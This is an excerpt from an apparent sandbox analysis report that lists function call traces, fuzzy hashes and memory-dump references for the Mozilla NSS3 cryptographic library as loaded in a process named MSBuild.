                                                                                        • PR_LogPrint.NSS3( ulDataLen = %d,?), ref: 6C6B6E13
                                                                                        • PR_LogPrint.NSS3( pDigest = 0x%p,?), ref: 6C6B6E2C
                                                                                        • PR_LogPrint.NSS3( pulDigestLen = 0x%p,?), ref: 6C6B6E47
                                                                                        • PR_LogPrint.NSS3( *pulDigestLen = 0x%x,?), ref: 6C6B6EB9
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2383759564.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2383730771.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2385733567.000000006C79F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386069150.000000006C7DE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386120788.000000006C7DF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386152856.000000006C7E0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386187014.000000006C7E5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_6c600000_MSBuild.jbxd
                                                                                        Similarity
                                                                                        • API ID: Print$L_strncpyz$L_strcatn
                                                                                        • String ID: *pulDigestLen = 0x%x$ hSession = 0x%x$ pData = 0x%p$ pDigest = 0x%p$ pulDigestLen = 0x%p$ ulDataLen = %d$ (CK_INVALID_HANDLE)$C_Digest$nyl
                                                                                        • API String ID: 1003633598-3362337952
                                                                                        • Opcode ID: 53e446827faade7445eabfb1cf09b5eae9954e69232229fae6edcb8b9499ede9
                                                                                        • Instruction ID: 2dec1aa3d0358f78a19f89a5c7bd5284e7356bb2efd76cf7339c908703081f30
                                                                                        • Opcode Fuzzy Hash: 53e446827faade7445eabfb1cf09b5eae9954e69232229fae6edcb8b9499ede9
                                                                                        • Instruction Fuzzy Hash: 6441B736601009AFDB04DF54DE4DB8A7BB1AB4A719F044034F508AB611DF31E96ACBA6
                                                                                        Function 6C6B8500 Relevance: 31.6, APIs: 9, Strings: 9, Instructions: 119COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • PR_LogPrint.NSS3(C_DecryptDigestUpdate), ref: 6C6B8526
                                                                                        • PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C6B8554
                                                                                        • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C6B8563
                                                                                          • Part of subcall function 6C79D930: PL_strncpyz.NSS3(?,?,?), ref: 6C79D963
                                                                                        • PR_LogPrint.NSS3(?,00000000), ref: 6C6B8579
                                                                                        • PR_LogPrint.NSS3( pEncryptedPart = 0x%p,?), ref: 6C6B859A
                                                                                        • PR_LogPrint.NSS3( ulEncryptedPartLen = %d,?), ref: 6C6B85B3
                                                                                        • PR_LogPrint.NSS3( pPart = 0x%p,?), ref: 6C6B85CC
                                                                                        • PR_LogPrint.NSS3( pulPartLen = 0x%p,?), ref: 6C6B85E7
                                                                                        • PR_LogPrint.NSS3( *pulPartLen = 0x%x,?), ref: 6C6B8659
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2383759564.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2383730771.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2385733567.000000006C79F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386069150.000000006C7DE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386120788.000000006C7DF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386152856.000000006C7E0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386187014.000000006C7E5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_6c600000_MSBuild.jbxd
                                                                                        Similarity
                                                                                        • API ID: Print$L_strncpyz$L_strcatn
                                                                                        • String ID: *pulPartLen = 0x%x$ hSession = 0x%x$ pEncryptedPart = 0x%p$ pPart = 0x%p$ pulPartLen = 0x%p$ ulEncryptedPartLen = %d$ (CK_INVALID_HANDLE)$C_DecryptDigestUpdate$nyl
                                                                                        • API String ID: 1003633598-473548163
                                                                                        • Opcode ID: 33527ee74d151faaae1665a44836339fc9260a93b514ef51954be1e414b6f11c
                                                                                        • Instruction ID: c4524ae7387d8a341d182d97bec9f545535ab20123e9aa18b5f6ca4d7b95d730
                                                                                        • Opcode Fuzzy Hash: 33527ee74d151faaae1665a44836339fc9260a93b514ef51954be1e414b6f11c
                                                                                        • Instruction Fuzzy Hash: F241C836601146AFDB40DF54DE4CE8A3BB1AB4E35DF084075F8086B621DF31DA69CBA6
                                                                                        Function 6C6C4C20 Relevance: 30.3, APIs: 20, Instructions: 290memoryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • TlsGetValue.KERNEL32 ref: 6C6C4C4C
                                                                                        • EnterCriticalSection.KERNEL32(?), ref: 6C6C4C60
                                                                                        • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?), ref: 6C6C4CA1
                                                                                        • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 6C6C4CBE
                                                                                        • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 6C6C4CD2
                                                                                        • realloc.MOZGLUE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C6C4D3A
                                                                                        • PORT_Alloc_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C6C4D4F
                                                                                        • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?), ref: 6C6C4DB7
                                                                                          • Part of subcall function 6C72DD70: TlsGetValue.KERNEL32 ref: 6C72DD8C
                                                                                          • Part of subcall function 6C72DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C72DDB4
                                                                                          • Part of subcall function 6C6707A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C60204A), ref: 6C6707AD
                                                                                          • Part of subcall function 6C6707A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C60204A), ref: 6C6707CD
                                                                                          • Part of subcall function 6C6707A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C60204A), ref: 6C6707D6
                                                                                          • Part of subcall function 6C6707A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C60204A), ref: 6C6707E4
                                                                                          • Part of subcall function 6C6707A0: TlsSetValue.KERNEL32(00000000,?,6C60204A), ref: 6C670864
                                                                                          • Part of subcall function 6C6707A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C670880
                                                                                          • Part of subcall function 6C6707A0: TlsSetValue.KERNEL32(00000000,?,?,6C60204A), ref: 6C6708CB
                                                                                          • Part of subcall function 6C6707A0: TlsGetValue.KERNEL32(?,?,6C60204A), ref: 6C6708D7
                                                                                          • Part of subcall function 6C6707A0: TlsGetValue.KERNEL32(?,?,6C60204A), ref: 6C6708FB
                                                                                        • TlsGetValue.KERNEL32 ref: 6C6C4DD7
                                                                                        • EnterCriticalSection.KERNEL32(?), ref: 6C6C4DEC
                                                                                        • PR_Unlock.NSS3(?), ref: 6C6C4E1B
                                                                                        • PR_SetError.NSS3(00000000,00000000), ref: 6C6C4E2F
                                                                                        • PR_SetError.NSS3(FFFFE013,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C6C4E5A
                                                                                        • PR_SetError.NSS3(00000000,00000000), ref: 6C6C4E71
                                                                                        • free.MOZGLUE(00000000), ref: 6C6C4E7A
                                                                                        • PR_Unlock.NSS3(?), ref: 6C6C4EA2
                                                                                        • TlsGetValue.KERNEL32 ref: 6C6C4EC1
                                                                                        • EnterCriticalSection.KERNEL32(?), ref: 6C6C4ED6
                                                                                        • PR_Unlock.NSS3(?), ref: 6C6C4F01
                                                                                        • free.MOZGLUE(00000000), ref: 6C6C4F2A
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2383759564.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2383730771.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2385733567.000000006C79F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386069150.000000006C7DE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386120788.000000006C7DF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386152856.000000006C7E0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386187014.000000006C7E5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_6c600000_MSBuild.jbxd
                                                                                        Similarity
                                                                                        • API ID: Value$CriticalSectionUnlock$Enter$Error$callocfree$Alloc_LeaveUtilrealloc
                                                                                        • String ID:
                                                                                        • API String ID: 759471828-0
                                                                                        • Opcode ID: e38fc24418d2a0e4f236e2bee345a124a28a7368c9d334f9959a2a12835c45f9
                                                                                        • Instruction ID: 01132f349bf8c36bbba34cf9e710e93b7a476b9807b3ef59e354b087a77f1009
                                                                                        • Opcode Fuzzy Hash: e38fc24418d2a0e4f236e2bee345a124a28a7368c9d334f9959a2a12835c45f9
                                                                                        • Instruction Fuzzy Hash: 8AB10DB1B002059FEB00EF68D888ABA77B4FF09319F044164ED1597B11EB74E961CBE6
                                                                                        Function 6C68C4B0 Relevance: 30.0, APIs: 16, Strings: 1, Instructions: 247COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C68C4D5
                                                                                          • Part of subcall function 6C6DBE30: SECOID_FindOID_Util.NSS3(6C69311B,00000000,?,6C69311B,?), ref: 6C6DBE44
                                                                                        • NSS_GetAlgorithmPolicy.NSS3(?,?), ref: 6C68C516
                                                                                        • NSS_GetAlgorithmPolicy.NSS3(?,?), ref: 6C68C530
                                                                                        • SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C68C54E
                                                                                        • NSS_GetAlgorithmPolicy.NSS3(00000000,00000000), ref: 6C68C5CB
                                                                                        • VFY_VerifyDataWithAlgorithmID.NSS3(00000002,?,?,?,?,?,?), ref: 6C68C712
                                                                                        • NSS_GetAlgorithmPolicy.NSS3(?,?), ref: 6C68C725
                                                                                        • PR_SetError.NSS3(FFFFE006,00000000), ref: 6C68C742
                                                                                        • PR_SetError.NSS3(FFFFE89D,00000000), ref: 6C68C751
                                                                                        • PL_FinishArenaPool.NSS3(?), ref: 6C68C77A
                                                                                        • NSS_GetAlgorithmPolicy.NSS3(?,00000000), ref: 6C68C78F
                                                                                        • NSS_GetAlgorithmPolicy.NSS3(?,00000000), ref: 6C68C7A9
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2383759564.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2383730771.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2385733567.000000006C79F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386069150.000000006C7DE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386120788.000000006C7DF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386152856.000000006C7E0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386187014.000000006C7E5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_6c600000_MSBuild.jbxd
                                                                                        Similarity
                                                                                        • API ID: Algorithm$Policy$Util$ErrorTag_$ArenaDataFindFinishPoolVerifyWith
                                                                                        • String ID: security
                                                                                        • API String ID: 1085474831-3315324353
                                                                                        • Opcode ID: 6adbaf5e98ffa77d02c2f479baea353469a18f6639dec35c7b6f8f60040b8500
                                                                                        • Instruction ID: 56eb5d37bb21b09a8642e7f34319d2346664a0b3316444ab6a176cc832eca82d
                                                                                        • Opcode Fuzzy Hash: 6adbaf5e98ffa77d02c2f479baea353469a18f6639dec35c7b6f8f60040b8500
                                                                                        • Instruction Fuzzy Hash: 52810971C06109BAEF10EB54DC44BEE7774EF0531CF244325E903A6A91E721D959CABE
                                                                                        Function 6C6F4500 Relevance: 28.8, APIs: 19, Instructions: 319threadCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • SECOID_FindOID_Util.NSS3(6C6F3803,?,6C6F3817,00000000), ref: 6C6F450E
                                                                                          • Part of subcall function 6C6E07B0: PL_HashTableLookupConst.NSS3(?,FFFFFFFF,?,?,6C688298,?,?,?,6C67FCE5,?), ref: 6C6E07BF
                                                                                          • Part of subcall function 6C6E07B0: PL_HashTableLookup.NSS3(?,?), ref: 6C6E07E6
                                                                                          • Part of subcall function 6C6E07B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C6E081B
                                                                                          • Part of subcall function 6C6E07B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C6E0825
                                                                                        • PR_SetError.NSS3(FFFFE005,00000000,?,6C6F3817,00000000), ref: 6C6F4550
                                                                                        • SECOID_FindOIDByTag_Util.NSS3(00000004,00000000), ref: 6C6F45B5
                                                                                        • SECOID_FindOIDByTag_Util.NSS3(000000BF,00000000), ref: 6C6F4709
                                                                                        • SECOID_GetAlgorithmTag_Util.NSS3(?,00000000), ref: 6C6F4727
                                                                                        • SECOID_GetAlgorithmTag_Util.NSS3(?,?,00000000), ref: 6C6F473B
                                                                                        • PORT_NewArena_Util.NSS3(00000400,?,?,?,?,?,?,?,00000000), ref: 6C6F4801
                                                                                        • SEC_ASN1EncodeItem_Util.NSS3(00000000,?,?,6C7B2DA0,?,?,?,?,?,?,?,?,00000000), ref: 6C6F482E
                                                                                        • PR_GetCurrentThread.NSS3 ref: 6C6F48F3
                                                                                        • PR_SetError.NSS3(FFFFE02F,00000000), ref: 6C6F4923
                                                                                        • PR_SetError.NSS3(FFFFE02F,00000000), ref: 6C6F4937
                                                                                        • SECKEY_DestroyPublicKey.NSS3(?,?,?,00000000), ref: 6C6F494E
                                                                                        • PR_SetError.NSS3(FFFFE02F,00000000,?,?,?,00000000), ref: 6C6F4963
                                                                                        • PORT_FreeArena_Util.NSS3(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6C6F4984
                                                                                        • VFY_VerifyDataWithAlgorithmID.NSS3(?,?,?,6C6F21C2,?,?,?), ref: 6C6F499C
                                                                                        • PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C6F49B5
                                                                                        • SECKEY_DestroyPublicKey.NSS3(?,?,?,?,?,00000000), ref: 6C6F49C5
                                                                                        • PR_SetError.NSS3(FFFFE00A,00000000), ref: 6C6F49DC
                                                                                        • PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C6F49E9
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2383759564.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2383730771.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2385733567.000000006C79F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386069150.000000006C7DE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386120788.000000006C7DF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386152856.000000006C7E0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386187014.000000006C7E5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_6c600000_MSBuild.jbxd
                                                                                        Similarity
                                                                                        • API ID: Util$Error$Arena_Tag_$AlgorithmFindFree$DestroyHashLookupPublicTable$ConstCurrentDataEncodeItem_ThreadVerifyWith
                                                                                        • String ID:
                                                                                        • API String ID: 3698863438-0
                                                                                        • Opcode ID: 7fb6f70d3f2cf9991c33a730e781bc9cead6b234e7c8d97fd30663f7250e779e
                                                                                        • Instruction ID: 2236c0d3461e06293285ca541988504602136173fc403239b688970ac53a85ea
                                                                                        • Opcode Fuzzy Hash: 7fb6f70d3f2cf9991c33a730e781bc9cead6b234e7c8d97fd30663f7250e779e
                                                                                        • Instruction Fuzzy Hash: CFA114B1E01204ABFF009A64DE40BFE3767AF0535CF244125EA35ABF91E771D84686AD
                                                                                        Function 6C6B4E60 Relevance: 28.1, APIs: 9, Strings: 7, Instructions: 127COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • PR_LogPrint.NSS3(C_GetAttributeValue), ref: 6C6B4E83
                                                                                        • PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C6B4EB8
                                                                                        • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C6B4EC7
                                                                                          • Part of subcall function 6C79D930: PL_strncpyz.NSS3(?,?,?), ref: 6C79D963
                                                                                        • PR_LogPrint.NSS3(?,00000000), ref: 6C6B4EDD
                                                                                        • PL_strncpyz.NSS3(?, hObject = 0x%x,00000050), ref: 6C6B4F0B
                                                                                        • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C6B4F1A
                                                                                        • PR_LogPrint.NSS3(?,00000000), ref: 6C6B4F30
                                                                                        • PR_LogPrint.NSS3( pTemplate = 0x%p,?), ref: 6C6B4F4F
                                                                                        • PR_LogPrint.NSS3( ulCount = %d,?), ref: 6C6B4F68
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2383759564.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2383730771.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2385733567.000000006C79F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386069150.000000006C7DE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386120788.000000006C7DF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386152856.000000006C7E0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386187014.000000006C7E5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_6c600000_MSBuild.jbxd
                                                                                        Similarity
                                                                                        • API ID: Print$L_strncpyz$L_strcatn
                                                                                        • String ID: hObject = 0x%x$ hSession = 0x%x$ pTemplate = 0x%p$ ulCount = %d$ (CK_INVALID_HANDLE)$C_GetAttributeValue$nyl
                                                                                        • API String ID: 1003633598-2181589088
                                                                                        • Opcode ID: 2d4910bdf5949c3c93426a78fab3950b0ee4d61b31244421679e695a2c842a9f
                                                                                        • Instruction ID: 076722da3a5d6321592637a16c01093c3e3c65db0fa5076f097d741a23cef969
                                                                                        • Opcode Fuzzy Hash: 2d4910bdf5949c3c93426a78fab3950b0ee4d61b31244421679e695a2c842a9f
                                                                                        • Instruction Fuzzy Hash: AF41D831601109ABDB00DF54DE8CFAA77B5EB4A31DF044034F4086B611DB70AE69CB6A
                                                                                        Function 6C6B4CD0 Relevance: 28.1, APIs: 9, Strings: 7, Instructions: 120COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • PR_LogPrint.NSS3(C_GetObjectSize), ref: 6C6B4CF3
                                                                                        • PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C6B4D28
                                                                                        • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C6B4D37
                                                                                          • Part of subcall function 6C79D930: PL_strncpyz.NSS3(?,?,?), ref: 6C79D963
                                                                                        • PR_LogPrint.NSS3(?,00000000), ref: 6C6B4D4D
                                                                                        • PL_strncpyz.NSS3(?, hObject = 0x%x,00000050), ref: 6C6B4D7B
                                                                                        • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C6B4D8A
                                                                                        • PR_LogPrint.NSS3(?,00000000), ref: 6C6B4DA0
                                                                                        • PR_LogPrint.NSS3( pulSize = 0x%p,?), ref: 6C6B4DBC
                                                                                        • PR_LogPrint.NSS3( *pulSize = 0x%x,?), ref: 6C6B4E20
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2383759564.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2383730771.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2385733567.000000006C79F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386069150.000000006C7DE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386120788.000000006C7DF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386152856.000000006C7E0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386187014.000000006C7E5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_6c600000_MSBuild.jbxd
                                                                                        Similarity
                                                                                        • API ID: Print$L_strncpyz$L_strcatn
                                                                                        • String ID: *pulSize = 0x%x$ hObject = 0x%x$ hSession = 0x%x$ pulSize = 0x%p$ (CK_INVALID_HANDLE)$C_GetObjectSize$nyl
                                                                                        • API String ID: 1003633598-2540521321
                                                                                        • Opcode ID: ac31d96c4b47a4ee604bdcca8671a73444e163339944206d5dd1e1db4b50dde8
                                                                                        • Instruction ID: 49cdfa0617141b6512a9563bb9a238adde6b6171994e95d0f0a13925b9f61431
                                                                                        • Opcode Fuzzy Hash: ac31d96c4b47a4ee604bdcca8671a73444e163339944206d5dd1e1db4b50dde8
                                                                                        • Instruction Fuzzy Hash: 2641E772601105AFDB409F50DE8CBAA3BB5EB4A35DF044434F9087B611DF709A69CB6A
                                                                                        Function 6C6D8E40 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 198stringmemoryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • memchr.VCRUNTIME140(abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789-_,00000000,00000041,6C6D8E01,00000000,6C6D9060,6C7E0B64), ref: 6C6D8E7B
                                                                                        • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,6C6D8E01,00000000,6C6D9060,6C7E0B64), ref: 6C6D8E9E
                                                                                        • PORT_ArenaAlloc_Util.NSS3(6C7E0B64,00000001,?,?,?,?,6C6D8E01,00000000,6C6D9060,6C7E0B64), ref: 6C6D8EAD
                                                                                        • memcpy.VCRUNTIME140(00000000,00000000,00000001,?,?,?,?,?,?,6C6D8E01,00000000,6C6D9060,6C7E0B64), ref: 6C6D8EC3
                                                                                        • strlen.API-MS-WIN-CRT-STRING-L1-1-0(5D8B5657,?,?,?,?,?,?,?,?,?,6C6D8E01,00000000,6C6D9060,6C7E0B64), ref: 6C6D8ED8
                                                                                        • PORT_ArenaAlloc_Util.NSS3(?,00000001,?,?,?,?,?,?,?,?,?,?,6C6D8E01,00000000,6C6D9060,6C7E0B64), ref: 6C6D8EE5
                                                                                        • memcpy.VCRUNTIME140(00000000,5D8B5657,00000001,?,?,?,?,?,?,?,?,?,?,?,?,6C6D8E01), ref: 6C6D8EFB
                                                                                        • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(6C7E0B64,6C7E0B64), ref: 6C6D8F11
                                                                                        • PORT_ArenaGrow_Util.NSS3(?,5D8B5657,643D8B08), ref: 6C6D8F3F
                                                                                          • Part of subcall function 6C6DA110: PORT_ArenaGrow_Util.NSS3(8514C483,EB2074C0,184D8B3E,?,00000000,00000000,00000000,FFFFFFFF,?,6C6DA421,00000000,00000000,6C6D9826), ref: 6C6DA136
                                                                                        • PR_SetError.NSS3(FFFFE013,00000000), ref: 6C6D904A
                                                                                        Strings
                                                                                        • abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789-_, xrefs: 6C6D8E76
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2383759564.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2383730771.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2385733567.000000006C79F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386069150.000000006C7DE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386120788.000000006C7DF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386152856.000000006C7E0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386187014.000000006C7E5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_6c600000_MSBuild.jbxd
                                                                                        Similarity
                                                                                        • API ID: ArenaUtil$Alloc_Grow_memcpystrlen$Errormemchrstrcmp
                                                                                        • String ID: abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789-_
                                                                                        • API String ID: 977052965-1032500510
                                                                                        • Opcode ID: ef0a1e7dd69e8057983319917fb645b2fbd73ad58b6be8ed7a42401b81fa2884
                                                                                        • Instruction ID: 8debcf0e3179f7e1759f0adca44af24722e83523095bf77d0d8080988ec19569
                                                                                        • Opcode Fuzzy Hash: ef0a1e7dd69e8057983319917fb645b2fbd73ad58b6be8ed7a42401b81fa2884
                                                                                        • Instruction Fuzzy Hash: 19619EB5D0020A9BDB10CF65DC84AABB7B9FF88358F154128DC18A7711EB32B915CBE5
                                                                                        Function 6C74CD70 Relevance: 26.3, APIs: 10, Strings: 5, Instructions: 76COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • PR_LoadLibrary.NSS3(ws2_32.dll,?,?,?,6C74CC7B), ref: 6C74CD7A
                                                                                          • Part of subcall function 6C74CE60: PR_LoadLibraryWithFlags.NSS3(?,?,?,?,00000000,?,6C6BC1A8,?), ref: 6C74CE92
                                                                                        • PR_FindSymbol.NSS3(00000000,freeaddrinfo), ref: 6C74CDA5
                                                                                        • PR_FindSymbol.NSS3(00000000,getnameinfo), ref: 6C74CDB8
                                                                                        • PR_UnloadLibrary.NSS3(00000000), ref: 6C74CDDB
                                                                                        • PR_FindSymbol.NSS3(00000000,getaddrinfo), ref: 6C74CD8E
                                                                                          • Part of subcall function 6C6705C0: PR_EnterMonitor.NSS3 ref: 6C6705D1
                                                                                          • Part of subcall function 6C6705C0: PR_ExitMonitor.NSS3 ref: 6C6705EA
                                                                                        • PR_LoadLibrary.NSS3(wship6.dll), ref: 6C74CDE8
                                                                                        • PR_FindSymbol.NSS3(00000000,getaddrinfo), ref: 6C74CDFF
                                                                                        • PR_FindSymbol.NSS3(00000000,freeaddrinfo), ref: 6C74CE16
                                                                                        • PR_FindSymbol.NSS3(00000000,getnameinfo), ref: 6C74CE29
                                                                                        • PR_UnloadLibrary.NSS3(00000000), ref: 6C74CE48
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2383759564.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2383730771.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2385733567.000000006C79F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386069150.000000006C7DE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386120788.000000006C7DF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386152856.000000006C7E0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386187014.000000006C7E5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_6c600000_MSBuild.jbxd
                                                                                        Similarity
                                                                                        • API ID: FindSymbol$Library$Load$MonitorUnload$EnterExitFlagsWith
